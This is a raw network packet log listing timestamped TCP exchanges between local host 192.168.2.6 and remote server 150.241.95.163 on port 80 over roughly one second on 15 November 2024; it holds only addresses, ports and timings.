Nov 15, 2024 10:35:57.930341959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.930360079 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.930427074 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.930459023 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.930732965 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.930751085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.930794954 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.931689978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954344988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954407930 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.954421043 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954437971 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954453945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954471111 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954483032 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.954488039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954510927 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.954914093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954931021 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954946995 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.954952955 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.955122948 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.981378078 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.981398106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.981412888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.981427908 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.981443882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.981508970 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.981561899 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.998802900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.998819113 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.998832941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.998888016 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.998928070 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.009403944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.009423018 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.009439945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.009500027 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.009696007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.009711981 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.009727001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.009752989 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.009784937 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.047673941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.047714949 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.047734976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.047754049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.047774076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.047898054 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.048067093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.048088074 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.048106909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.048150063 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.048197031 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.071645975 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.071751118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.071770906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.071790934 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.071820974 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.071861029 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.071904898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.072029114 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.072076082 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.072134972 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.072150946 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.072166920 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.072196007 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.098591089 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.098732948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.098736048 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.098772049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.098804951 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.098825932 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.098839045 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.098869085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.098881960 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.116286993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.116323948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.116358995 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.116422892 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.116486073 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.116522074 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.116527081 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.116626024 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.126863003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.126883030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.126899004 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.126914978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.126929998 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.126938105 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.126995087 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.127033949 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.164433002 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.164449930 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.164462090 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.164639950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.164654970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.164663076 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.164666891 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.164745092 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.164910078 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.165049076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.165098906 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.188608885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.188635111 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.188646078 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.188832998 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.188889027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.188900948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.188913107 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.188945055 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.188982964 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.189312935 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.189338923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.189349890 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.189361095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.189371109 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.189373016 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.189399004 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.215487003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.215498924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.215508938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.215574980 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.215595007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.215656996 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.215854883 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.215869904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.215950012 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.233253956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.233268976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.233347893 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.233529091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.233583927 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.233616114 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.243613005 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.243626118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.243635893 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.243773937 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.244226933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.244236946 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.244247913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.244259119 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.244286060 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.244319916 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.281538010 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.281552076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.281567097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.281713009 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.281788111 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.281788111 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.281994104 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.282004118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.282015085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.282027006 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.282037973 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.282054901 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.282087088 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.305795908 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.305808067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.305819035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.305965900 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.305965900 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.306041002 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.306054115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.306092978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.306103945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.306106091 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.306117058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.306143045 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.306924105 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.306936026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.306946993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.306988955 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.307024956 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.332967043 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.333023071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.333039045 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.333055019 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.333072901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.333275080 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.350703955 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.350801945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.350837946 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.350950003 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.360881090 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.360912085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.360928059 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.360968113 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.361017942 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.361066103 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.361114025 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.361272097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.361282110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.361315966 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.398938894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.398951054 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.398962975 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.399120092 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.399120092 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.399866104 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.399878979 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.399889946 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.399902105 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.399913073 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.399935961 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.399981022 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.400439978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.400451899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.400463104 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.400496960 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.400527954 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.422966003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.422977924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.422987938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.423135042 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.423187971 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.423203945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.423213959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.423260927 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.423268080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.423281908 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.423288107 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.423321962 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.449997902 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.450036049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.450042963 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.450051069 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.450123072 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.450171947 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.450293064 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.450309992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.450321913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.450333118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.450484037 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.450484037 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.467777967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.467791080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.467803001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.467842102 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.478259087 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.478272915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.478285074 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.478321075 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.478353977 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.478658915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.478672981 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.478723049 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.516766071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.516797066 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.516808033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.516860008 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.516932011 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.516944885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.517079115 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.517235994 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.517249107 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.517260075 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.517287970 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.517287970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.517302990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.517312050 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.517338991 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.541208029 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.541235924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.541245937 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.541460991 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.541611910 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.541629076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.541645050 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.541740894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.541754961 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.541825056 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.541825056 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.543586016 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.567068100 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.567164898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.567186117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.567198038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.567210913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.567224026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.567235947 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.567389011 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.567389011 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.568114042 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.568125963 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.568139076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.568150997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.568186045 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.568233013 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.585376024 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.585392952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.585405111 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.585462093 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.585501909 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.595455885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.595465899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.595477104 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.595505953 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.595525026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.595554113 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.595592022 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.634088993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634126902 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634140968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634151936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634165049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634217978 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.634305000 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.634438038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634454966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634486914 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634499073 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634511948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.634511948 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.634541035 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.657248974 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.657264948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.657294989 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.657308102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.657308102 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.657321930 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.657335997 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.657372952 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.658046007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.658071995 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.658083916 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.658116102 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.658123970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.658138037 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.658171892 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.684202909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.684216976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.684227943 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.684341908 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.684355021 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.684439898 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.684439898 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.684468031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.684483051 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.684498072 CET	80	49741	150.241.95.163	192.168.2.6
